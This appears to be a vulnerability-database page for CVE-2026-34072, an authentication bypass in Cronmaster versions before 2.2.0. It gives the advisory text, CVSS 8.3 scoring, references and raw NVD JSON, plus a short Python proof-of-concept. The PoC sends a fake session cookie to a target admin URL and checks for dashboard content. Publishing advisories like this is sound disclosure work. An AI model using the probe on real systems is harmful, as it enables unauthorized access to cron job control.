CVE-2026-34072

Description

Cr*nMaster (cronmaster) is a Cronjob management UI with human readable syntax, live logging and log history for cronjobs. Prior to version 2.2.0, an authentication bypass in middleware allows unauthenticated requests with an invalid session cookie to be treated as authenticated when the middleware’s session-validation fetch fails. This can result in unauthorized access to protected pages and unauthorized execution of privileged Next.js Server Actions. This issue has been patched in version 2.2.0.

CVSS Details

CVSS Score

8.3

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:L

Configurations (Affected Products)

No configuration data available.

Cronmaster < 2.2.0

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests

# Target URL (Example)
target_url = "http://target-cronmaster.example.com/admin"

# Use an invalid or arbitrary session cookie
# According to the vulnerability, if the validation fetch fails,
# this cookie might be treated as authenticated.
cookies = {
    "session": "invalid_session_token_12345"
}

headers = {
    "User-Agent": "CVE-2026-34072-PoC"
}

try:
    response = requests.get(target_url, cookies=cookies, headers=headers, timeout=10)
    
    if response.status_code == 200:
        print("[+] Potential Authentication Bypass Successful!")
        print(f"[+] Response Length: {len(response.text)}")
        # Check for admin-specific content in response
        if "Dashboard" in response.text or "Cronjob" in response.text:
            print("[+] Admin content detected.")
    else:
        print(f"[-] Request failed with status code: {response.status_code}")

except Exception as e:
    print(f"[-] Error occurred: {e}")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-34072
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-34072
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-34072/
[4] VulDB https://vuldb.com/cve/CVE-2026-34072
[5] https://github.com/fccview/cronmaster/releases/tag/2.2.0
[6] https://github.com/fccview/cronmaster/security/advisories/GHSA-9whh-mffv-xvh6

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-34072", "sourceIdentifier": "[email protected]", "published": "2026-04-01T18:16:29.340", "lastModified": "2026-04-03T16:10:52.680", "vulnStatus": "Awaiting Analysis", "cveTags": [], "descriptions": [{"lang": "en", "value": "Cr*nMaster (cronmaster) is a Cronjob management UI with human readable syntax, live logging and log history for cronjobs. Prior to version 2.2.0, an authentication bypass in middleware allows unauthenticated requests with an invalid session cookie to be treated as authenticated when the middleware’s session-validation fetch fails. This can result in unauthorized access to protected pages and unauthorized execution of privileged Next.js Server Actions. This issue has been patched in version 2.2.0."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:L", "baseScore": 8.3, "baseSeverity": "HIGH", "attackVector": "ADJACENT_NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 5.5}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-287"}, {"lang": "en", "value": "CWE-306"}, {"lang": "en", "value": "CWE-693"}]}], "references": [{"url": "https://github.com/fccview/cronmaster/releases/tag/2.2.0", "source": "[email protected]"}, {"url": "https://github.com/fccview/cronmaster/security/advisories/GHSA-9whh-mffv-xvh6", "source": "[email protected]"}]}}